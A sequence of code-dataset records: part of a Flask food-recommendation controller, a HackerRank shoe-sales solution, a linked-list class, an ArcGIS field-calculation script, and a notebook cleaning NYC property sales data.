'siang':pref_preprocessing['siang'].iloc[sim_index],\n 'malam':pref_preprocessing['malam'].iloc[sim_index]\n }\n data = pd.DataFrame(data)\n return data\n\n\ndef sisaKalori(data):\n pageData = {\n \"breadcrumb\": \"Rekomendasi\",\n \"pageHeader\": \"Sistem Rekomendasi\"\n }\n\n\n #eaten_food_mass = float(eaten_food_mass)\n kalori_harian = 0\n sisa_kalori = 0\n\n #with open('/Users/elisha/flask-project/app/module/food_dataset_seminar.csv', encoding= 'unicode_escape') as csv_file:\n # data_apa = csv.reader(csv_file, delimiter=',')\n # first_line = True\n # dataset = []\n # for row in data_apa:\n # if not first_line:\n # dataset.append({\n # \"nama_makanan\": row[1],\n # \"energi\": row[2],\n # \"protein\": row[3],\n # \"lemak\": row[4],\n # \"karbo\":row[5],\n # \"natrium\" : row[6],\n # \"bahan_bahan\": 
row[7],\n # \"bahan_stemmed\" : row[8],\n # \"langkah\" : row[9],\n # \"kategori_masakan\": row[10]\n # })\n # else:\n # first_line = False\n\n data_apa = makanancontroller.readMakanan()\n print(data_apa)\n print(type(data_apa))\n df = data_apa.values.tolist()\n print(df)\n first_line = True\n dataset = []\n for row in df:\n if not first_line:\n dataset.append({\n \"nama_makanan\": row[0],\n \"energi\": row[1],\n \"protein\": row[2],\n \"lemak\": row[3],\n \"karbo\":row[4],\n \"natrium\" : row[5],\n \"bahan_bahan\": row[6],\n \"bahan_stemmed\": row[7],\n \"langkah\": row[8],\n \"kategori_masakan\": row[9]\n })\n else:\n first_line = False\n\n #Hitung BMR pengguna\n if (data['jenis_kelamin'] == 2): bmr_u = 10 * data['berat_badan'] + 6.25 * data['tinggi_badan'] - 5 * data['usia'] + 5\n elif (data['jenis_kelamin'] == 1): bmr_u = 10 * data['berat_badan'] + 6.25 * data['tinggi_badan'] - 5 * data['usia'] - 161\n\n #Hitung Kebutuhan Kalori Harian Pengguna\n if (data['tingkat_aktivitas'] == 1): kalori_harian = bmr_u * 1.2\n elif (data['tingkat_aktivitas'] == 2): kalori_harian = bmr_u * 1.375\n elif (data['tingkat_aktivitas'] == 3): kalori_harian = bmr_u * 1.55\n elif (data['tingkat_aktivitas'] == 4): kalori_harian = bmr_u * 1.725\n elif (data['tingkat_aktivitas'] == 5): kalori_harian = bmr_u * 1.9\n \n\n df = pd.DataFrame(dataset)\n #Cek kalori makanan yang sudah dimakan dan Hitung sisa kalori\n eaten_food = clean_split(data['eaten_food'])\n eaten_food_mass = clean_split(data['eaten_food_mass'])\n c_makanan = clean_split(data['c_makanan'])\n print(c_makanan)\n temp_kal = 0\n temp_prot = 0\n temp_nat = 0\n temp_total = kalori_harian\n print(eaten_food_mass)\n for i,st in enumerate(eaten_food):\n print(i,st)\n temp = 0\n temp_2 = 0\n temp_3 = 0\n if (st in df['nama_makanan'].values):\n for j,mass in enumerate(eaten_food_mass):\n if i == j:\n print(st,mass)\n mass = float(mass)\n temp = float(df.loc[df.nama_makanan == st,'energi'])\n #temp_kal = temp_kal + temp\n #print(temp_kal)\n #kalori_eaten_food = temp_kal\n temp_total = temp_total - (temp * (mass/100))\n print(\"ini sisa kalori\")\n print(temp_total)\n temp_2 = float(df.loc[df.nama_makanan == st,'protein'])\n temp_prot = temp_prot + (temp_2 * (mass/100))\n print(temp_prot)\n temp_3 = float(df.loc[df.nama_makanan == st,'natrium'])\n temp_nat = temp_nat + (temp_3 * (mass/100))\n print(temp_nat)\n print(eaten_food_mass)\n for mass in eaten_food_mass:\n temp = 0\n mass = float(mass)\n print(mass)\n #kalori_eaten_food = temp_kal\n protein_eaten_food = temp_prot\n natrium_eaten_food = temp_nat\n sisa_kalori = temp_total\n kalori_pagi = 25 * sisa_kalori / 100\n kalori_siang = 30 * sisa_kalori / 100\n kalori_malam = 25 * sisa_kalori / 100\n kalori_snack_pagi = 10 * sisa_kalori / 100\n kalori_snack_sore = 10 * sisa_kalori / 100\n\n data_user = {\n 'berat_badan': data['berat_badan'],\n 'tinggi_badan': data['tinggi_badan'],\n 'usia': data['usia'],\n 'jenis_kelamin': data['jenis_kelamin'],\n 'tingkat_aktivitas': data['tingkat_aktivitas'],\n 'penyakit': data['penyakit'],\n 'c_makanan': c_makanan,\n 'pref_bahan': data['pref_bahan'],\n 'eaten_food': eaten_food,\n 'eaten_food_mass': eaten_food_mass,\n 'id_user':data['id_user'],\n 'bmr':bmr_u,\n 'kalori_harian':kalori_harian,\n 'sisa_kalori': sisa_kalori\n }\n\n print(\"ini data user:\", data_user)\n #result = save(data_user)\n \n ### INSERT DB ###\n save(data_user)\n\n #Define a new data frame to store the preferred foods. 
Copy the contents of df to df_user\n df_user = pd.DataFrame(dataset)\n df_u = {'berat_badan': data['berat_badan'],\n 'tinggi_badan': data['tinggi_badan'],\n 'usia': data['usia'],\n 'jenis_kelamin': data['jenis_kelamin'],\n 'aktivitas': data['tingkat_aktivitas'],\n 'penyakit': data['penyakit'],\n 'constraint_makanan': c_makanan,\n 'pref_bahan': data['pref_bahan'],\n 'eaten_food': eaten_food,\n 'eaten_food_mass': eaten_food_mass,\n 'bmr': bmr_u,\n 'kalori_harian': kalori_harian,\n 'sisa_kalori': sisa_kalori,\n 'kalori_pagi': kalori_pagi,\n 'kalori_siang': kalori_siang,\n 'kalori_malam': kalori_malam,\n 'kalori_snack_pagi': kalori_snack_pagi,\n 'kalori_snack_sore': kalori_snack_sore}\n print(type(df_user))\n df_user['protein'] = df_user['protein'].astype(float)\n df_user['natrium'] = df_user['natrium'].astype(float)\n df_user['energi'] = df_user['energi'].astype(float)\n print(type(df_user))\n\n #c_makanan = df_u['constraint_makanan'].values[0]\n #c_makanan = str(c_makanan)\n #print(c_makanan)\n df_user_new = pd.DataFrame(dataset)\n\n #Filter based on the condition\n df_user = df_user[~df_user['kategori_masakan'].str.contains('side_dish')]\n df_user = df_user[df_user['energi'] <= sisa_kalori]\n if (c_makanan == '0'):\n print(df_user)\n print(\"df user sebelum masuk ke filtering:\")\n print(type(df_user))\n print('penyakit:')\n print(data['penyakit'])\n if (data['penyakit'] == '0'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '1'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif data['penyakit'] == '2': df_user = df_user[(df_user.protein <= (75 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '3'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (2500 - natrium_eaten_food))]\n else: print(\"invalid\")\n print('df_user baru woyyyyy:')\n print(df_user)\n print(type(df_user))\n else:\n #df_user = df_user.where(c_makanan not in df_user['bahan_stemmed'])\n if (data['penyakit'] == '0'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '1'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '2'): df_user = df_user[(df_user.protein <= (75 - protein_eaten_food)) & (df_user.natrium <= (3000 - natrium_eaten_food))]\n elif (data['penyakit'] == '3'): df_user = df_user[(df_user.protein <= (100 - protein_eaten_food)) & (df_user.natrium <= (2500 - natrium_eaten_food))]\n else: print(\"invalid\")\n for cons in c_makanan: \n df_user = df_user[~df_user['bahan_stemmed'].str.contains(cons)]\n print('df_user baru woyyyyy:')\n print(df_user)\n print(type(df_user))\n \n print(\"df user hasil KB:\")\n print(df_user)\n\n df_user['pagi'] = np.round((100 * kalori_pagi / df_user['energi'].values),1)\n print(\"ini porsi pagi:\", df_user['pagi'])\n df_user['siang'] = np.round((100 * kalori_siang / df_user['energi'].values),1)\n print(\"ini porsi siang:\", df_user['siang'])\n df_user['malam'] = np.round((100 * kalori_malam / df_user['energi'].values),1)\n print(\"ini porsi malam:\", df_user['malam']) \n pref_preprocessing = preprocessing(data['pref_bahan'], df_u, df_user)\n #pref_preprocessing\n\n tfidf_train = tfidf_func(df_user)\n #print(tfidf_train)\n\n 
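# Hedged sketch (editor's addition, not original code): cosine similarity between\n    # two TF-IDF rows a and b is dot(a, b) / (||a|| * ||b||). For binary vectors\n    # a = [1, 1, 0] and b = [1, 0, 1] that gives 1 / (sqrt(2) * sqrt(2)) = 0.5,\n    # which is what cossim_func() computes pairwise over the whole matrix below.\n    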
cossim_train = cossim_func(tfidf_train)\n #print(cossim_train)\n\n personal_recommendations = recommendation_result(pref_preprocessing)\n\n data_df = personal_recommendations\n print(\"ini data_df:\")\n print(data_df.columns.values)\n print(data_df)\n data_df = personal_recommendations.values.tolist()\n print(\"ini list dataframe:\")\n print(data_df)\n print(\"tipe data_Df: \")\n print(type(data_df))\n first_line = True\n dataset_df = []\n for row in data_df:\n #row = row.tolist()\n #print(isinstance(row,list))\n print(\"ini type row:\")\n print(type(row))\n #if (isinstance(row,list)):\n # print(row)\n # dataset_df.append(row)\n if not first_line:\n print(row[1])\n dataset_df.append({\n \"nama_makanan\": row[0],\n \"energi\": row[1],\n \"protein\": row[2],\n \"lemak\": row[3],\n \"karbo\": row[4],\n \"natrium\": row[5],\n \"bahan_bahan\": row[6],\n \"langkah\" : row[7],\n \"pagi\": row[8],\n \"siang\": row[9],\n \"malam\": row[10]\n })\n else:\n first_line = False\n \n data_user_output = {\n 'berat_badan' : data['berat_badan'],\n 'tinggi_badan' : data['tinggi_badan'],\n 'usia' : data['usia'],\n 'kalori_harian' : kalori_harian,\n 'sisa_kalori' : sisa_kalori,\n 'dataset_df' : dataset_df,\n 'kalori_pagi' : kalori_pagi,\n 'kalori_siang' : kalori_siang,\n 'kalori_malam' : kalori_malam,\n 'waktu_makan' : data['waktu_makan']\n }\n id_makanan = personal_recommendations.index\n id_makanan = id_makanan.tolist()\n print(\"list id makanan:\", id_makanan)\n print(type(id_makanan))\n for i in id_makanan:\n data_rekomendasi = {\n 'id_user':data['id_user'],\n 'id_makanan':i\n }\n save_rec(data_rekomendasi)\n #return render_template(\"recommender.html\",\n # pageData=pageData,\n # berat_badan = data['berat_badan'],\n # tinggi_badan = data['tinggi_badan'],\n # usia = data['usia'],\n # kalori_harian = kalori_harian,\n # sisa_kalori = sisa_kalori,\n # menu='data', submenu='data', dataset_df=dataset_df)\n \n return data_user_output\n\n\n \n\n\ndef save(data):\n try:\n print(\"ini data fungsi save\", data)\n berat_badan = data[\"berat_badan\"]\n tinggi_badan = data[\"tinggi_badan\"]\n usia = data[\"usia\"]\n jenis_kelamin = data[\"jenis_kelamin\"]\n tingkat_aktivitas = data[\"tingkat_aktivitas\"]\n penyakit = data[\"penyakit\"]\n c_makanan = str(data[\"c_makanan\"])\n pref_bahan = data[\"pref_bahan\"]\n eaten_food = data[\"eaten_food\"]\n eaten_food_mass = data[\"eaten_food_mass\"]\n id_user = data[\"id_user\"]\n bmr = data[\"bmr\"]\n kalori_harian = data[\"kalori_harian\"]\n sisa_kalori = data[\"sisa_kalori\"]\n\n #tampung constructor nya\n users = User(id_user=id_user, umur=usia, jenis_kelamin=jenis_kelamin, berat_badan=berat_badan, tinggi_badan=tinggi_badan, aktivitas_fisik=tingkat_aktivitas, riwayat_penyakit=penyakit, c_makanan=c_makanan, pref_bahan=pref_bahan, bmr=bmr, jumlah_kalori_per_hari=kalori_harian, sisa_kalori=sisa_kalori)\n db.session.add(users)\n db.session.commit()\n\n return response.success('', 'Sukses menambahkan data user!')\n except Exception as e:\n print(e)\n\n\ndef save_rec(data):\n try:\n print(\"ini data fungsi save\", data)\n id_user = data[\"id_user\"]\n id_makanan = data[\"id_makanan\"]\n\n #tampung constructor nya\n foods = Rekomendasi(id_user=id_user, id_makanan=id_makanan)\n db.session.add(foods)\n db.session.commit()\n\n return response.success('', 'Sukses menambahkan data user!')\n except Exception as e:\n print(e)\n\n\n#get all user\ndef index():\n try:\n #select all\n users = User.query.all()\n #bikin format\n data = formatarray(users)\n return response.success(data, 
\"success\")\n except Exception as e:\n print(e)\n\n# append to array\ndef formatarray(datas):\n array = []\n\n for i in datas:\n array.append(singleObject(i))\n\n return array\n\n#fungsi format dalam bentuk single object\ndef singleObject(data):\n data = {\n 'id': data.id,\n 'usia': data.umur,\n 'berat_badan': data.berat_badan,\n 'tinggi_badan': data.tinggi_badan,\n 'aktivitas_fisik': data.aktivitas_fisik,\n 'riwayat_penyakit': data.riwayat_penyakit,\n 'pref_bahan': data.pref_bahan,\n 'bmr': data.bmr,\n 'kalori_harian': data.jumlah_kalori_per_hari,\n 'sisa_kalori': data.sisa_kalori,\n 'id_user': data.id_user,\n 'jenis_kelamin': data.jenis_kelamin,\n 'c_makanan': data.c_makanan\n }\n \n return data\n\n\n#get detail user\ndef detail(id_user):\n try:\n data_user = User.query.filter_by(id_user=id_user).first()\n if not data_user:\n return response.badRequest([], 'Tidak ada data user!')\n #data_users = formatUser(data_user)\n data_users = singleUser(data_user)\n #return response.success(data_users, \"success\")\n return data_users\n except Exception as e:\n print(e)\n\ndef singleUser(data_user):\n data = {\n 'id': data_user.id,\n 'usia': data_user.umur,\n 'berat_badan': data_user.berat_badan,\n 'tinggi_badan': data_user.tinggi_badan,\n 'aktivitas_fisik': data_user.aktivitas_fisik,\n 'riwayat_penyakit': data_user.riwayat_penyakit,\n 'pref_bahan': data_user.pref_bahan,\n 'bmr': data_user.bmr,\n 'kalori_harian': data_user.jumlah_kalori_per_hari,\n 'sisa_kalori': data_user.sisa_kalori,\n 'id_user': data_user.id_user,\n 'jenis_kelamin': data_user.jenis_kelamin,\n 'c_makanan': data_user.c_makanan\n }\n\n return data\n\ndef formatUser(data):\n array = []\n for i in data:\n array.append(singleUser(i))\n return array\n\n#update data pref bahan\ndef updateKalori(data):\n#eaten_food_mass = float(eaten_food_mass)\n kalori_harian = float(data['kalori_harian'])\n sisa_kalori = float(data['sisa_kalori'])\n print(sisa_kalori)\n print(kalori_harian)\n print(type(kalori_harian))\n\n with open('/Users/elisha/flask-project/app/module/food_dataset_seminar.csv', encoding= 'unicode_escape') as csv_file:\n data_apa = csv.reader(csv_file, delimiter=',')\n first_line = True\n dataset = []\n for row in data_apa:\n if not first_line:\n dataset.append({\n \"nama_makanan\": row[1],\n \"energi\": row[2],\n \"protein\": row[3],\n \"lemak\": row[4],\n \"karbo\":row[5],\n \"natrium\" : row[6],\n \"bahan_bahan\": row[7],\n \"bahan_stemmed\" : row[8],\n \"langkah\" : row[9],\n \"kategori_masakan\": row[10]\n })\n else:\n first_line = False\n\n df = pd.DataFrame(dataset)\n #Cek kalori makanan yang sudah dimakan dan Hitung sisa kalori\n eaten_food = clean_split(data['eaten_food'])\n eaten_food_mass = clean_split(data['eaten_food_mass'])\n c_makanan = clean_split(data['c_makanan'])\n print(c_makanan)\n temp_kal = 0\n temp_prot = 0\n temp_nat = 0\n temp_total = sisa_kalori\n print(\"ini kalori harian sebelum dihitung lagi\",temp_total)\n print(eaten_food_mass)\n for i,st in enumerate(eaten_food):\n print(i,st)\n temp = 0\n temp_2 = 0\n temp_3 = 0\n if (st in df['nama_makanan'].values):\n for j,mass in enumerate(eaten_food_mass):\n if i == j:\n print(st,mass)\n mass = float(mass)\n temp = float(df.loc[df.nama_makanan == st,'energi'])\n print(temp)\n #temp_kal = temp_kal + temp\n #print(temp_kal)\n #kalori_eaten_food = temp_kal\n print(temp_total)\n temp_total = temp_total - (temp * (mass/100))\n print(\"ini sisa kalori\")\n print(temp_total)\n temp_2 = float(df.loc[df.nama_makanan == st,'protein'])\n temp_prot = temp_prot + (temp_2 * 
(mass/100))\n print(temp_prot)\n temp_3 = float(df.loc[df.nama_makanan == st,'natrium'])\n temp_nat = temp_nat + (temp_3 * (mass/100))\n print(temp_nat)\n print(eaten_food_mass)\n for mass in eaten_food_mass:\n temp = 0\n mass = float(mass)\n print(mass)\n #kalori_eaten_food = temp_kal\n protein_eaten_food = temp_prot\n natrium_eaten_food = temp_nat\n sisa_kalori = temp_total\n kalori_pagi = 25 * sisa_kalori / 100\n kalori_siang = 30 * sisa_kalori / 100\n kalori_malam = 25 * sisa_kalori / 100\n kalori_snack_pagi = 10 * sisa_kalori / 100\n kalori_snack_sore = 10 * sisa_kalori / 100\n \n print(\"ini sisa kalori: \",sisa_kalori)\n print(\"ini kalori harian: \",kalori_harian)\n data_user = {\n 'id_user':data['id_user'],\n 'kalori_harian':kalori_harian,\n 'sisa_kalori': sisa_kalori\n }\n\n result = ubah(data_user)\n print('ini result eh',result)\n\n\n return result\n\n\ndef ubah(data):\n try:\n #eaten_food = request.form.get('eaten_food')\n #pref_bahan = request.form.get('pref_bahan')\n\n #input = [\n # {\n # 'eaten_food': eaten_food,\n # 'pref_bahan': pref_bahan\n # }\n #]\n\n id_user = data[\"id_user\"]\n kalori_harian = data[\"kalori_harian\"]\n sisa_kalori = data[\"sisa_kalori\"]\n print(sisa_kalori)\n print(\"ini id_user\",id_user)\n\n data_user = User.query.filter_by(id_user=id_user).first()\n data_apa_gitu = singleUser(data_user)\n print(data_apa_gitu)\n #data_user.eaten_food = eaten_food\n #data_user.pref_bahan = pref_bahan\n data_user.sisa_kalori = sisa_kalori\n print(data_user.sisa_kalori)\n\n db.session.commit()\n\n return 'berhasil update'\n except Exception as e:\n print(e)","repo_name":"yesyualeon/food-recommender","sub_path":"app/module/UserController.py","file_name":"UserController.py","file_ext":"py","file_size_in_byte":24282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"483770722","text":"# https://www.hackerrank.com/challenges/collections-counter/problem\n\n# Shoe shop, his shop has x number of shoes\n# He has a list containing the size of each shoe he has in his shop.\n# N number of customers are willing to pay y amount of money\n# only if they get the shoe of their desired size.\n# Compute how much money shop owner earned.\n'''\nSample Input:\n10\n2 3 4 5 6 8 7 6 5 18\n6\n6 55\n6 45\n6 55\n4 40\n18 60\n10 50\n\nSample Output:\n200\n'''\n\n# Solution:\nfrom collections import Counter\n\nshoes = int(input())\nsizes = list(map(int, input().split()))\ncounts = Counter(sizes)\ncustomers = int(input())\nneed = []\nfor i in range(customers):\n temp = input().split()\n need.append(temp)\nmoney = 0\nfor person in need:\n if int(person[0]) in counts:\n if counts[int(person[0])]!=0:\n counts[int(person[0])] -= 1\n money += int(person[1])\nprint(money)\n","repo_name":"Deeraj-Kumar-K/Python_Programs","sub_path":"11 - sell shoes according to sizes/sellShoes.py","file_name":"sellShoes.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72925888153","text":"# Simple Linked List with Python\r\n\r\nclass Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next_node = None\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = Node(None)\r\n self.tail = self.head # references head node (same object)\r\n\r\n def append(self, node_val):\r\n next_node = Node(node_val) # new node with given value as value\r\n temp = self.tail # create temp reference to current tail\r\n temp.next_node = next_node\r\n 
self.tail = next_node\r\n\r\n def prepend(self, node_val):\r\n new_first = Node(node_val)\r\n temp = self.head.next_node\r\n self.head.next_node = new_first\r\n new_first.next_node = temp\r\n\r\n # inserted node will become nth element, nth element will become nth + 1\r\n def insert(self, node_val, index: int):\r\n new_node = Node(node_val)\r\n curr_node = self.head.next_node\r\n prev_node = None\r\n count = 0\r\n while count < index:\r\n prev_node = curr_node\r\n curr_node = curr_node.next_node\r\n count += 1\r\n prev_node.next_node = new_node\r\n new_node.next_node = curr_node\r\n\r\n def get(self, index: int):\r\n count = 0\r\n curr_node = self.head.next_node\r\n while count < index:\r\n curr_node = curr_node.next_node\r\n count += 1\r\n return curr_node.value\r\n\r\n def pop(self, index=-1):\r\n if index == 0:\r\n curr_node = self.head.next_node\r\n self.head.next_node = curr_node.next_node\r\n elif index > 0:\r\n count = 0\r\n curr_node = self.head.next_node\r\n prev_node = None\r\n next_node = None\r\n while count < index:\r\n prev_node = curr_node\r\n curr_node = curr_node.next_node\r\n next_node = curr_node.next_node\r\n count += 1\r\n prev_node.next_node = next_node\r\n elif index == -1:\r\n curr_node = self.head\r\n prev_node = None\r\n while curr_node.next_node:\r\n prev_node = curr_node\r\n curr_node = curr_node.next_node\r\n prev_node.next_node = None\r\n else:\r\n pass\r\n\r\n def __iter__(self):\r\n self.curr_node = self.head\r\n return self\r\n\r\n def __next__(self):\r\n if self.curr_node.next_node:\r\n node_val = self.curr_node.next_node.value\r\n self.curr_node = self.curr_node.next_node\r\n return node_val\r\n raise StopIteration\r\n\r\n def __len__(self):\r\n return sum(1 for _ in self)\r\n\r\n def __str__(self):\r\n node = self.head\r\n out = \"\"\r\n while node.next_node:\r\n out += f\"[{node.next_node.value}] -> \"\r\n node = node.next_node\r\n return out[:-4] # remove trailing arrow\r\n\r\n\r\ndef main():\r\n mylist = LinkedList()\r\n \r\n mylist.append(4)\r\n mylist.append(5)\r\n mylist.append(6)\r\n mylist.append(8)\r\n \r\n mylist.prepend(3)\r\n mylist.prepend(2)\r\n mylist.prepend(1)\r\n mylist.prepend(0)\r\n \r\n mylist.insert(7, 7)\r\n \r\n mylist.pop()\r\n mylist.pop(0)\r\n mylist.pop(5)\r\n \r\n x = mylist.get(1)\r\n \r\n print(x)\r\n\r\n print(mylist)\r\n print(len(mylist))\r\n\r\n for node in mylist:\r\n print(node)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"rowleynt/LinkedLists","sub_path":"Python3/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10320517081","text":"\n# Import system modules\nimport arcpy\nfrom arcpy import env\nimport os\nimport sys\nimport numpy\n\n\n# Overwrite Output\narcpy.env.overwriteOutput = True\n\n# Read the parameter values\n# InputFolder = arcpy.GetParameterAsText(0)\n# OutputFolder = arcpy.GetParameterAsText(1)\nInputFolder = \"D:\\\\MSc Thesis\\\\CCAR Database\\\\1991\\\\Resilience_1991_Input\"\nOutputFolder = \"D:\\\\MSc Thesis\\\\CCAR Database\\\\1991\\\\Resilience_1991_Output\"\n\n# Creating Functions\ndef fcs_in_workspace(InputFolder):\n\n # Create output folder\n if not os.path.exists(OutputFolder):\n os.makedirs(OutputFolder)\n\n # Create loop for copy feature\n suffix = \".shp\"\n for root, subFolders, files in os.walk(InputFolder):\n for fileName in files:\n if fileName.endswith(suffix):\n arcpy.env.workspace = root\n fclist = 
arcpy.ListFeatureClasses()\n for fc in fclist:\n fc_copy = os.path.join(OutputFolder, fc.strip(\".shp\"))\n fc_path = os.path.join(OutputFolder, fc)\n # fc must start with an upper-case character for the feature to be copied correctly\n arcpy.CopyFeatures_management(fc, fc_copy)\n\n # Describe the copied shapefiles\n desc = arcpy.Describe(fc_path)\n\n # if the copied feature is _____\n if desc.name == \"Income_EA.shp\":\n # List the copy feature attribute fields\n fields = arcpy.ListFields(fc_path)\n # Manually enter field names to keep here\n # include mandatory fields name in keepFields\n keepFields = [\"FID\", \"Shape\", \"EA\", \"EA_STR\", \"OID_\", \"COL60\"]\n # Automatically drop fields\n dropFields = [x.name for x in fields if x.name not in keepFields]\n # Delete fields\n arcpy.DeleteField_management(fc_path, dropFields)\n # Converts a feature class to NumPy structured array.\n statsfield = arcpy.da.FeatureClassToNumPyArray(fc_path, (\"COL60\"))\n u = statsfield[\"COL60\"].mean()\n sd = statsfield[\"COL60\"].std()\n factor = u / sd\n # Add z score field\n fieldname = arcpy.ValidateFieldName(\"z_score\")\n arcpy.AddField_management(fc_path, fieldname, \"DOUBLE\", \"\", \"\", 50)\n # Calculate z score Field\n # Change \"factor\" into string to feed calculate field (new format available)\n # print(\"factor: %f\\n\" % factor)\n expression = \"!COL60! * %f\" % factor\n arcpy.CalculateField_management(fc_path, fieldname, expression, \"PYTHON_9.3\")\n # Rename\n arcpy.Rename_management(fc_path, \"Household_Average_Income_Income_1991_DA.shp\")\n\n\nif __name__ == '__main__':\n fcs_in_workspace(InputFolder)\n\n","repo_name":"shawnlcwang/GIS_VancouverSocioeconomicResilienceClusterAnalysis","sub_path":"Flood Resilience Python/RM_Variables_Calculation.py","file_name":"RM_Variables_Calculation.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10161616086","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # **Load Data**\n\n# ## Set up Data Path\n\n# In[758]:\n\n\n## Initialization\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os\n\nDATA_PATH = os.getcwd() + '/data/'\n\n\n# In[759]:\n\n\ndf = pd.read_csv(os.getcwd() + '/final.sales.csv',skipinitialspace=True,low_memory=False)\nprint('number of rows:'+str(df.shape[0])+'\\n'+'number of columns:'+str(df.shape[1]))\n\n\n# In[760]:\n\n\ndf.info()\ndf.shape\n\n\n# In[761]:\n\n\ndf.head(5)\n\n\n# # **Data Cleaning**\n\n# ## Edit Column Name\n\n# In[762]:\n\n\ndf = df.loc[:, ~df.columns.str.contains('^Unnamed')]\n\n\n# ## Reformat Part of Object Columns Contents into Numeric \n\n# In[763]:\n\n\ndf['LAND SQUARE FEET']=df['LAND SQUARE FEET'].apply(lambda x: x.replace(',',''))\ndf['LAND SQUARE FEET']=df['LAND SQUARE FEET'].apply(lambda x: x.replace('?',''))\ndf['GROSS SQUARE FEET']=df['GROSS SQUARE FEET'].apply(lambda x: x.replace(',',''))\n\ndf['RESIDENTIAL UNITS']=df['RESIDENTIAL UNITS'].apply(lambda x: x.replace(',',''))\ndf['COMMERCIAL UNITS']=df['COMMERCIAL UNITS'].apply(lambda x: x.replace(',',''))\ndf['TOTAL UNITS']=df['TOTAL UNITS'].apply(lambda x: x.replace(',',''))\n\ndf['SALE PRICE']=df['SALE PRICE'].apply(lambda x: x.replace('$',''))\ndf['SALE PRICE']=df['SALE PRICE'].apply(lambda x: x.replace(',',''))\ndf['SALE 
PRICE']=df['SALE PRICE'].apply(lambda x: x.replace('-',''))\ndf['SALE PRICE']=df['SALE PRICE'].apply(lambda x: x.replace('?',''))\ndf['SALE PRICE'] = df['SALE PRICE'].str.replace(' ', '').str.replace(str(chr(8377)), '').copy()\ndf['SALE PRICE'].replace('', np.nan, inplace=True)\n\n\n# ## Edit Column Type\n\n# In[764]:\n\n\ndf['LAND SQUARE FEET']=df['LAND SQUARE FEET'].astype(int)\ndf['GROSS SQUARE FEET']=df['GROSS SQUARE FEET'].astype(int)\ndf['SALE PRICE']=df['SALE PRICE'].astype(float)\n\ndf['RESIDENTIAL UNITS']=df['RESIDENTIAL UNITS'].astype(float)\ndf['COMMERCIAL UNITS']=df['COMMERCIAL UNITS'].astype(float)\ndf['TOTAL UNITS']=df['TOTAL UNITS'].astype(float)\ndf['YEAR BUILT']=df['YEAR BUILT'].astype(int)\ndf['TAX CLASS AT TIME OF SALE']=df['TAX CLASS AT TIME OF SALE'].astype(int)\ndf['BOROUGH']=df['BOROUGH'].astype('object')\ndf['SALE DATE']=df['SALE DATE'].astype('datetime64[ns]')\n\n\n# In[765]:\n\n\ndf.info()\n\n\n# ## Remove Na/NaN and Unnecessary Columns\n\n# In[766]:\n\n\ndf.drop(['EASE-MENT','ADDRESS','APARTMENT NUMBER','BUILDING CLASS AT PRESENT','BUILDING CLASS AT TIME OF SALE','NEIGHBORHOOD'], \n axis = 1, inplace=True)\n\n\n# In[767]:\n\n\ndf.isna().sum()\n\n\n# In[768]:\n\n\ndf = df.dropna()\n\n\n# In[769]:\n\n\ndf.isna().sum()\n\n\n# In[770]:\n\n\ndf.fillna('NA', inplace=True)\ndf.isna().sum()\n\n\n# ## Filter Data Values\n\n# ### Sale Price\n\n# In[771]:\n\n\n# remove records with a sale price of 0\ndf = df[df['SALE PRICE']!=0]\ndf['SALE PRICE'].describe()\n\n\n# In[772]:\n\n\n# Plot the distribution of SALE PRICE\nplt.boxplot(df['SALE PRICE'])\nplt.show()\n\n\n# In[775]:\n\n\n# we can see that the sales price is highly skewed, so we decided to remove prices larger than 2 * 10^9\ndf = df[df['SALE PRICE']<2*10**9]\ndf.shape\n\n\n# In[776]:\n\n\n# Plot the distribution of SALE PRICE\nplt.boxplot(df['SALE PRICE'])\nplt.show()\n\n\n# In[777]:\n\n\npercent_75 = np.percentile(df['SALE PRICE'], 75)\nnp.percentile(df['SALE PRICE'], 1)\ndf = df[df['SALE PRICE'] < percent_75]\nplt.hist(df['SALE PRICE'], bins= 100)\nplt.show()\n\n\n# In[778]:\n\n\n# Remove the records with too low sales price\ndf = df[df['SALE PRICE']>100000]\nplt.hist(df['SALE PRICE'], bins= 50)\nplt.show()\n\n\n# ### Zip Code & Square Feet\n\n# In[779]:\n\n\n# remove records whose zip code is not in New York (less than 10000)\ndf= df[df['ZIP CODE']>10000]\ndf= df[df['GROSS SQUARE FEET']>0]\ndf= df[df['LAND SQUARE FEET']>0]\n\n\n# In[780]:\n\n\ndf['ZIP CODE'].describe()\n\n\n# In[781]:\n\n\ndf.shape\n\n\n# In[785]:\n\n\ndf['ZIP CODE']=df['ZIP CODE'].astype('object')\ndf['BOROUGH']=df['BOROUGH'].astype('object')\n\n\n# ## Data Overview\n\n# In[786]:\n\n\ndf.shape\n\n\n# In[787]:\n\n\ndf.info()\n\n\n# In[788]:\n\n\ndf.describe()\n\n\n# # **Exploratory Data Analysis**\n\n# ## Describe Numeric Data\n\n# In[789]:\n\n\n## Explore numerical features\ndf.describe(include=[np.number])\n\n\n# In[790]:\n\n\ncol=['BOROUGH','ZIP CODE','BLOCK','LOT','LAND 